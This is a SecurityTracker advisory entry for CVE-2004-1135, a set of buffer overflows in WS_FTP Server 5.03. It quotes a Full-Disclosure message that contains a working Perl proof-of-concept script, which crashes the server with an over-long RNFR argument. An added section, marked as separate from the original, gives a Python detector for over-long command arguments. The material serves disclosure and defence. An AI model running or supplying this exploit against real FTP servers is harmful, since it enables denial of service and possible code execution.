SecurityTracker Archives
Category:   Application (File Transfer/Sharing)  >   WS_FTP
Vendors:   Ipswitch
WS_FTP Buffer Overflow in Processing Certain FTP Commands Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012353
SecurityTracker URL:  http://securitytracker.com/id/1012353
CVE Reference:   CVE-2004-1135   (Links to External Site)
Updated:  Dec 8 2004
Original Entry Date:  Nov 29 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.03, 2004.10.14
Description:   Several vulnerabilities were reported in WS_FTP Server. A remote authenticated user can execute arbitrary code on the target system.

Reed Arvin reported that a remote authenticated user can trigger a buffer overflow in several FTP commands. The SITE, XMKD, MKD, and RNFR FTP commands are affected. A remote user can cause the FTP service to crash or execute arbitrary code.

A demonstration exploit is available at:

http://noph0bia.lostspirits.org/Exploits/IPSWSFTP-exploit.c

The vendor was notified without response.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/ws_ftp-server/index.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Dec 20 2004 (Vendor Issues Fix) WS_FTP Buffer Overflow in Processing Certain FTP Commands Lets Remote Users Execute Arbitrary Code
The vendor has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] Multiple buffer overflows in WS_FTP Server Version 5.03, 2004.10.14.


Summary:
Multiple buffer overflows exist in WS_FTP Server Version 5.03,
2004.10.14 (http://www.ipswitch.com/).

Details:
Multiple buffer overflows exist in WS_FTP Server Version 5.03,
2004.10.14. There are four vulnerable commands that can be used to
cause these buffer overflows. Three of the vulnerable commands can be
used to stop the WS_FTP Server service resulting in a denial of
service. The vulnerable commands are SITE, XMKD, MKD, and RNFR.

Vulnerable Versions:
WS_FTP Server Version 5.03, 2004.10.14

Solutions:
The vendor was notified of the issue. There was no response.

Exploit:
http://noph0bia.lostspirits.org/Exploits/IPSWSFTP-exploit.c (Thanks to
NoPh0bia noph0bia[at]lostspirits[dot]org)

#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>
#        WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => "21",
				    Proto    => "TCP"))
{
	print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";

	sleep(1);

	print $socket "USER $ARGV[1]\r\n";

	sleep(1);

	print $socket "PASS $ARGV[2]\r\n";

	sleep(1);

	print $socket "PORT 127,0,0,1,18,12\r\n";

	sleep(1);

	print $socket "RNFR " . "A" x 768 . "\r\n";

	close($socket);

	sleep(1);

	if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
					    PeerPort => "21",
					    Proto    => "TCP"))
	{
		close($socket);

		print "failed!\n";
	}
	else
	{
		print "successful!\n";
	}
}
else
{
	print "Cannot connect to $ARGV[0]:21\n";
}
#===== End WS_FTP_Overflow.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
Exploit assistance from NoPh0bia noph0bia[at]lostspirits[dot]org
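
An added detection example (not part of the SecurityTracker entry or the Full-Disclosure message): it scans FTP control-channel lines for over-long arguments to the four affected commands, which is the condition the advisory describes. The 255-byte threshold, the function names and the sample session are assumptions constructed for illustration.

```python
# Added example: flag over-long arguments to the FTP commands the advisory names.
AFFECTED = {"SITE", "XMKD", "MKD", "RNFR"}   # command list from the advisory
MAX_ARG_LEN = 255   # assumed alert threshold in bytes; tune per site

def parse_command(raw: bytes):
    """Split one control-channel line into (VERB, argument bytes)."""
    verb, _, arg = raw.rstrip(b"\r\n").partition(b" ")
    # FTP verbs are case-insensitive, so normalise before matching.
    return verb.decode("ascii", "replace").upper(), arg

def inspect_session(lines, max_arg_len=MAX_ARG_LEN):
    """Return one finding per affected command whose argument is too long.

    The last USER value is tracked because the flaw requires an
    authenticated session, so the account name belongs in the alert.
    """
    findings, user = [], None
    for lineno, raw in enumerate(lines, 1):
        verb, arg = parse_command(raw)
        if verb == "USER":
            user = arg.decode("ascii", "replace")
        elif verb in AFFECTED and len(arg) > max_arg_len:
            findings.append({
                "line": lineno,
                "user": user,
                "verb": verb,
                "arg_len": len(arg),
                # A single repeated byte is typical filler, not a real path.
                "filler": len(set(arg)) == 1,
            })
    return findings

# Constructed sample session (not captured traffic).
SAMPLE = [
    b"USER alice\r\n",
    b"PASS example-password\r\n",
    b"MKD reports-2004\r\n",
    b"SITE CHMOD 644 index.html\r\n",
    b"rnfr " + b"A" * 768 + b"\r\n",          # same length as the quoted PoC
    b"XMKD " + b"archive/" * 40 + b"\r\n",    # 320 bytes, varied content
]

if __name__ == "__main__":
    for finding in inspect_session(SAMPLE):
        print(finding)
```

The same check can run over server command logs or a reassembled port 21 stream; the length is measured on the raw argument bytes before any decoding.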
